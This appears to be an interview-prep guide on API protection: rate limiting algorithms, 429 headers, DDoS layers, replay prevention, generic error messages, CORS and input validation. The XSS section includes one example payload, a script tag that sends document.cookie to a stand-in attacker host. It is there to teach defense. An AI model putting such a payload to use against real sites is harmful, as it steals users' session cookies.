Skip to content

Rate Limiting and Protection

TL;DR

Rate limiting caps requests per time window to enforce fairness (and rejects excess with 429). Throttling slows or queues excess requests to protect system stability. Use per-user, per-IP, and per-endpoint strategies. Beyond rate limiting, protect your API with secure error messages (never leak internals), replay attack prevention, CORS configuration, and input validation. Mentioning rate limiting in an interview signals production awareness.

The Nightclub Analogy

Imagine a popular nightclub with a capacity of 500 people.

Rate limiting is the bouncer at the door. "We've let in 500 people tonight. Sorry, you'll have to come back tomorrow." The bouncer rejects people who exceed the limit. Fair to everyone — first come, first served.

Throttling is more like a slow-moving queue. Instead of rejecting people outright, the nightclub lets people trickle in as others leave. "You're in the queue. You'll get in when there's space." The system slows down rather than cutting off.

Both exist to protect the system, but they work differently and solve different problems.

Rate Limiting Throttling
Purpose Fairness — prevent any one user from hogging resources Stability — prevent the system from being overwhelmed
What happens when limit is hit Request is rejected (429 Too Many Requests) Request is delayed/queued
Analogy "Sorry, the nightclub is full. Come back tomorrow." "You're in line. We'll let you in when there's room."
Protects against Abusive users, scrapers, bots Traffic spikes, cascading failures, flash crowds
Granularity Per-user, per-IP, per-API-key System-wide, per-service

In practice, most production APIs implement both. Rate limiting on the edge (API gateway) for fairness, throttling internally (service mesh, load balancer) for stability.

Token bucket rate limiting


Rate Limiting Strategies

Not all requests are equal. A GET /events (read, cacheable, cheap) is very different from POST /bookings (write, transactional, expensive). Your rate limits should reflect this.

Per-User Rate Limiting

The most common strategy. Each authenticated user gets a quota:

Authenticated users: 1,000 requests per hour
Premium users: 10,000 requests per hour

The user is identified by their JWT (or API key). This prevents any single user from monopolizing your API while giving higher limits to paying customers.

Per-IP Rate Limiting

For unauthenticated endpoints (login, registration, public search):

Unauthenticated requests: 100 requests per hour per IP address

This catches brute-force attacks and scrapers that don't have API keys. But be careful — many users can share an IP address (corporate offices, university networks, mobile carriers using NAT). Rate limiting by IP alone can accidentally block legitimate users.

Per-Endpoint Rate Limiting

Some endpoints deserve tighter limits than others:

Endpoint Limit Why
GET /events 1,000/hour Read-only, cacheable, cheap
POST /bookings 10/minute Prevents ticket scalping bots
POST /login 5/minute Prevents brute-force password attacks
POST /payments 3/minute Expensive operation, fraud prevention
GET /search 100/minute Computationally expensive queries

Per-Tenant Rate Limiting

In multi-tenant systems, you also rate-limit by tenant to prevent one tenant from degrading service for others:

Tenant (organization): 50,000 requests per hour
Individual user within tenant: 5,000 requests per hour

This creates a two-tier limit — the organization has a ceiling, and individual users within that organization have their own, smaller ceiling.


Rate Limiting Algorithms

When asked "how would you implement rate limiting?" in an interview, you should know the main algorithms and their trade-offs.

Token Bucket

Think of a bucket that holds tokens. Each request consumes one token. Tokens refill at a fixed rate. If the bucket is empty, requests are rejected.

Bucket capacity: 10 tokens
Refill rate: 1 token per second

Second 0:  Bucket has 10 tokens
           → 10 requests arrive → all served → bucket: 0
Second 1:  1 token refills → bucket: 1
           → 1 request arrives → served → bucket: 0
Second 5:  5 tokens have refilled → bucket: 5
           → 8 requests arrive → 5 served, 3 rejected

Pros: Allows short bursts (up to bucket capacity), smooth refill. Cons: Slightly more complex to implement.

Used by: AWS API Gateway, Stripe, most production rate limiters.

Sliding Window

Count requests in a rolling time window. If a user made 100 requests in the last 60 minutes, they've hit their hourly limit.

Window: 60 minutes, rolling
Limit: 100 requests

12:00 → User makes 50 requests (50/100 used)
12:30 → User makes 40 requests (90/100 used)
12:45 → User makes 15 requests... 10 served, 5 rejected (100/100)
13:01 → The 50 requests from 12:00 fall out of the window → 55/100 used

Pros: Precise, no boundary issues. Cons: Requires storing timestamps for each request (memory-intensive).

Fixed Window

Simpler than sliding window. Count requests in fixed time intervals (e.g., every hour from :00 to :59).

Window: 12:00-12:59, Limit: 100

12:00 → requests start counting
12:55 → User has made 95 requests
12:59 → User makes 5 more → hits 100 → rejected for rest of window
13:00 → Counter resets to 0 → user can make requests again

Pros: Simple, low memory. Cons: Boundary problem — a user could send 100 requests at 12:59 and 100 more at 13:00, effectively getting 200 requests in 2 minutes.

Algorithm Comparison

Algorithm Burst Handling Memory Precision Boundary Issues
Token Bucket Allows controlled bursts Low Good None
Sliding Window Smooth, no bursts High (stores timestamps) Excellent None
Fixed Window None Very low Approximate Yes — double rate at boundaries

Interview Tip

"I'd use a token bucket algorithm implemented in Redis" is a great answer. It's the industry standard, handles bursts gracefully, and Redis provides the atomic operations needed for distributed rate limiting. Don't design the algorithm from scratch unless explicitly asked.


The 429 Response

When a client exceeds the rate limit, the API returns HTTP 429 Too Many Requests with helpful headers:

HTTP/1.1 429 Too Many Requests
Content-Type: application/json
Retry-After: 30
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 0
X-RateLimit-Reset: 1717024800

{
  "error": "Rate limit exceeded. Please retry after 30 seconds."
}

The headers tell the client:

Header Meaning Example
Retry-After Seconds until the client can retry 30
X-RateLimit-Limit Maximum requests allowed in the window 100
X-RateLimit-Remaining Requests remaining in the current window 0
X-RateLimit-Reset Unix timestamp when the window resets 1717024800

Good API clients read these headers and implement exponential backoff — waiting longer between retries instead of hammering the API.


DDoS Protection

Rate limiting is your first line of defense against Distributed Denial of Service (DDoS) attacks, but it's not enough on its own. A real DDoS attack comes from thousands of IP addresses, so per-IP rate limiting won't stop it.

Defense in Depth

Layer Tool What It Does
Edge / CDN Cloudflare, AWS CloudFront Absorbs traffic at the network edge before it reaches your servers. Geographic distribution makes it hard to overwhelm.
WAF AWS WAF, Cloudflare WAF Web Application Firewall — pattern detection for malicious requests (SQL injection, XSS, known attack signatures).
API Gateway Kong, AWS API Gateway Rate limiting, authentication, request validation. First application-layer defense.
Application Your code Per-user rate limiting, business logic validation, input sanitization.
Infrastructure AWS Shield, auto-scaling Network-level DDoS mitigation, automatic scaling to absorb traffic spikes.

The principle is defense in depth — multiple layers, each catching what the previous layer missed. No single layer is sufficient.


Replay Attack Prevention

A replay attack is when an attacker intercepts a valid request and sends it again. Imagine someone eavesdrops on your "transfer $100 to Alice" API call and replays it 50 times. You just lost $5,000.

How Replay Attacks Work

1. User sends: POST /transfer { "to": "alice", "amount": 100 }
   Authorization: Bearer eyJ...

2. Attacker intercepts this request (via network sniffing, proxy, etc.)

3. Attacker replays the exact same request 50 times
   → Server sees a valid JWT, valid request → processes all 50

Prevention Strategies

Short-lived tokens: JWTs with 15-minute expiration reduce the replay window. Even if captured, the token becomes useless quickly.

Nonces (number used once): Each request includes a unique random string. The server tracks nonces it's already seen and rejects duplicates.

POST /transfer
Authorization: Bearer eyJ...
X-Request-Nonce: a1b2c3d4e5f6
X-Request-Timestamp: 1717024000

Server:
  1. Is the timestamp within 5 minutes of server time? → Yes
  2. Have I seen nonce a1b2c3d4e5f6 before? → No → process
  3. Store nonce in Redis with 5-minute TTL

Replay:
  1. Is the timestamp within 5 minutes? → Maybe
  2. Have I seen this nonce? → YES → reject (409 Conflict)

Idempotency keys: For payment and financial APIs, the client sends an Idempotency-Key header. The server stores the result of the first request and returns the same result for any duplicate key — without processing the transaction again.

POST /payments
Idempotency-Key: pay_abc123
{ "amount": 100, "to": "alice" }

First time: Process payment → return { "id": "txn_789", "status": "completed" }
Replay:     Lookup pay_abc123 → return same { "id": "txn_789", "status": "completed" }
            (payment is NOT processed again)

Stripe uses this pattern extensively. It's the gold standard for preventing duplicate transactions.


Security in Error Messages

This is a subtle but important security concern that separates junior from senior API design.

The Problem: Information Leakage

Consider a login endpoint. When authentication fails, what do you return?

Insecure:

{
  "error": "User alice@example.com not found"
}
or
{
  "error": "Wrong password for alice@example.com"
}

Why this is dangerous: An attacker can now enumerate valid email addresses. They try alice@example.com and get "wrong password" — now they know Alice has an account. They try bob@example.com and get "user not found" — Bob doesn't have an account. With a list of emails and an automated script, they can map out your entire user base.

Secure:

{
  "error": "Invalid credentials"
}

Same generic message whether the email doesn't exist, the password is wrong, or the account is locked. The attacker learns nothing.

The Rule: Generic Externally, Detailed Internally

What the User Sees What the Server Logs
"Invalid credentials" "Login failed: user alice@example.com not found in database"
"Something went wrong" "NullPointerException at PaymentService.java:142 — missing tenant_id in JWT"
"Unable to process request" "SQL timeout on query SELECT * FROM events WHERE venue_id = 456 — 30s exceeded"

Never expose:

  • Stack traces
  • SQL queries or database errors
  • Internal IP addresses or service names
  • File paths on the server
  • Specific validation details that reveal system structure

Always return:

  • Generic, user-friendly error messages
  • Appropriate HTTP status codes (400, 401, 403, 404, 500)
  • A request ID for correlation ("request_id": "req_abc123") so support can look up detailed logs

Interview Tip

When designing error responses, mention that you'd return generic error messages to prevent information leakage, while logging detailed errors internally. It's a one-sentence comment that signals production awareness.


CORS — Cross-Origin Resource Sharing

CORS is a browser security mechanism that prevents a website at evil.com from making API calls to yourbank.com using your cookies. It's not an API design choice — it's a browser restriction you need to configure correctly.

How CORS Works

When a browser makes a cross-origin request (e.g., JavaScript on frontend.com calls api.backend.com), the browser first sends a preflight request (an OPTIONS request) asking the server "is this allowed?"

Browser (frontend.com) → Server (api.backend.com):

OPTIONS /api/events HTTP/1.1
Origin: https://frontend.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Authorization, Content-Type

Server → Browser:
HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://frontend.com
Access-Control-Allow-Methods: GET, POST, PUT, DELETE
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Max-Age: 86400

If the server's response allows the origin, method, and headers, the browser proceeds with the actual request. If not, the browser blocks it — the JavaScript code gets a CORS error.

Key CORS Headers

Header What It Controls Example
Access-Control-Allow-Origin Which origins can make requests https://frontend.com (specific) or * (any — dangerous for authenticated APIs)
Access-Control-Allow-Methods Which HTTP methods are allowed GET, POST, PUT, DELETE
Access-Control-Allow-Headers Which custom headers are allowed Authorization, Content-Type
Access-Control-Allow-Credentials Whether cookies/auth headers are sent true (required for authenticated requests)
Access-Control-Max-Age How long to cache the preflight response 86400 (24 hours)

Common Mistakes

  • Using Access-Control-Allow-Origin: * with credentials. The browser rejects this combination. If you send cookies or Authorization headers, you must specify exact origins.
  • Forgetting the preflight. OPTIONS requests must return CORS headers. If your server doesn't handle OPTIONS, the browser blocks the actual request.
  • Overly permissive origins. Allowing * on an authenticated API means any website can make requests with your users' credentials.

Input Validation and Sanitization

Every piece of data from the client is untrusted. Even if your frontend validates input, an attacker can bypass the frontend and send raw HTTP requests. Server-side validation is mandatory.

What to Validate

Check What It Prevents Example
Type checking Malformed data Reject "age": "twenty" when expecting an integer
Range checking Out-of-bounds values Reject "quantity": -5 or "quantity": 999999
Length limits Buffer overflow, DoS Reject names longer than 255 characters
Format validation Invalid data Reject "email": "not-an-email"
SQL injection prevention Database attacks Use parameterized queries, never string concatenation
XSS prevention Cross-site scripting Sanitize HTML/JS in user input before storing or rendering

XSS Prevention

Cross-Site Scripting (XSS) is when an attacker injects malicious JavaScript through user input that gets rendered in other users' browsers.

Attacker submits event name: <script>document.location='https://evil.com/?cookie='+document.cookie</script>

If stored and rendered without sanitization:
  → Every user who views this event has their cookies stolen

Prevention:

  • Sanitize on input: Strip or encode HTML tags from user input.
  • Escape on output: When rendering user-generated content, HTML-encode special characters (<&lt;, >&gt;).
  • Content-Security-Policy header: Tell the browser to only execute scripts from trusted sources.
  • HttpOnly cookies: Prevent JavaScript from accessing session cookies.

Putting It All Together: A Defense Checklist

When designing an API's security posture in an interview, here's what to cover:

Layer What to Mention
Authentication "JWT-based auth with RS256 signing"
Authorization "RBAC with roles: customer, manager, admin. User identity from JWT."
Multi-tenancy "Tenant ID in JWT, all queries scoped by tenant"
Rate limiting "Token bucket at the API gateway: 1000 req/hr per user, stricter limits on write endpoints"
Error handling "Generic error messages externally, detailed logging internally"
Input validation "Server-side validation on all inputs, parameterized queries"
CORS "Restrict origins to our frontend domains"
Transport "HTTPS everywhere, no HTTP"

You don't need to deep-dive into every layer unless asked. Mentioning rate limiting and secure error messages is usually enough to signal production awareness. The interviewer will probe deeper if they want more detail.

Interview Tip

Rate limiting is the single most impactful security topic to mention in a system design interview. Saying "I'd add rate limiting at the API gateway — 1000 requests per hour per user, with tighter limits on booking and payment endpoints" takes 5 seconds and immediately signals that you've thought about production traffic patterns. Don't design the rate limiting algorithm unless asked.


Quick Recap

  • Rate limiting caps requests per time window and rejects excess (429). It enforces fairness.
  • Throttling slows or queues excess requests to protect system stability. Different from rate limiting.
  • Rate limit by user, IP, endpoint, and tenant. Not all endpoints deserve the same limits.
  • Token bucket is the industry-standard algorithm. Implemented in Redis for distributed systems.
  • 429 Too Many Requests with Retry-After and X-RateLimit-* headers tells clients when to retry.
  • DDoS protection requires defense in depth: CDN, WAF, API gateway, application logic.
  • Replay attacks are prevented with nonces, timestamps, short-lived tokens, and idempotency keys.
  • Error messages must be generic externally ("Invalid credentials") and detailed internally (logs). Never leak stack traces, SQL, or internal IPs.
  • CORS must be configured correctly — don't use * with credentials.
  • Validate all input server-side. The frontend is not a security boundary.

Interview Expectations: Junior vs. Senior

  • Junior/Mid-level: Mentions rate limiting to stop abuse. Might casually say "store limits in a database" without considering the latency impact.
  • Senior/Staff: Places rate limiting at the API Gateway or edge level using fast, in-memory datastores (Redis). Chooses the right algorithm (Token Bucket vs Fixed Window) based on whether burst traffic should be allowed or strictly smoothed. Mentions returning standard 429 Too Many Requests status codes with Retry-After headers.